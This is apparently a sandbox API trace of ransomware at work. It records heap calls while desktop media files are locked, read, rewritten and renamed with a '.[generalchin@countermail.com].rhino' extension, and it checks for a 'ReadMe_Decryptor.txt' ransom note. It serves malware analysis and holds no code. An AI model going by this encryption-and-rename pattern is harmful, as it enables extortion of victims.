[0078.430] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.430] GetLastError () returned 0x0 [0078.430] SetLastError (dwErrCode=0x0) [0078.430] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2661) returned 0x6ee498 [0078.431] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.431] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.431] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.431] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.431] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.431] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.431] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0078.431] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.431] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6f0b08 [0078.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x715898 [0078.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0b08 | out: hHeap=0x6d0000) returned 1 [0078.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7166b0 [0078.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x717bf0 [0078.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7166b0 | out: hHeap=0x6d0000) returned 1 [0078.433] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x744cd8 [0078.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717bf0 | out: hHeap=0x6d0000) returned 1 [0078.436] WriteFile (in: hFile=0x124, lpBuffer=0x744ce0*, nNumberOfBytesToWrite=0x275e, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x744ce0*, lpNumberOfBytesWritten=0x4af2ac*=0x275e, lpOverlapped=0x0) returned 1 [0078.437] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.439] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x275e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.439] CloseHandle (hObject=0x124) returned 1 [0078.833] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6f36d0 [0078.833] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0078.833] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.833] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EUG9E.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eug9e.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EUG9E.mp3.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eug9e.mp3.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.835] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0078.835] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.835] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.835] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.835] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0078.835] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.835] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.835] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0078.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.836] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.836] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ForGKyvpOl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\forgkyvpol.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.836] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x60c7 [0078.836] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x61e7, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.836] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.836] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.838] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.838] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x60c7, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x60c7, lpOverlapped=0x0) returned 1 [0078.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.839] GetLastError () returned 0x0 [0078.839] SetLastError (dwErrCode=0x0) [0078.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60ea) returned 0x744cd8 [0078.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.839] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0078.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0078.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0078.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0078.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0078.842] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0078.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0078.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.846] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x74add0 [0078.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.848] WriteFile (in: hFile=0x124, lpBuffer=0x74ade0*, nNumberOfBytesToWrite=0x61e7, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x74ade0*, lpNumberOfBytesWritten=0x4af2ac*=0x61e7, lpOverlapped=0x0) returned 1 [0078.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74add0 | out: hHeap=0x6d0000) returned 1 [0078.849] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x61e7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.849] CloseHandle (hObject=0x124) returned 1 [0078.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0078.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0078.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0078.851] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ForGKyvpOl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\forgkyvpol.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ForGKyvpOl.swf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\forgkyvpol.swf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.853] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Gu4AkFdp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gu4akfdp.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.854] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x1703e [0078.854] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1715e, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.854] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.854] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.856] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.856] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x1703e, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x1703e, lpOverlapped=0x0) returned 1 [0078.857] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.857] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.857] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.857] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.857] GetLastError () returned 0x0 [0078.858] SetLastError (dwErrCode=0x0) [0078.858] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.858] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17061) returned 0x744cd8 [0078.859] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.859] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.859] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.859] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.859] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0078.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0078.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, 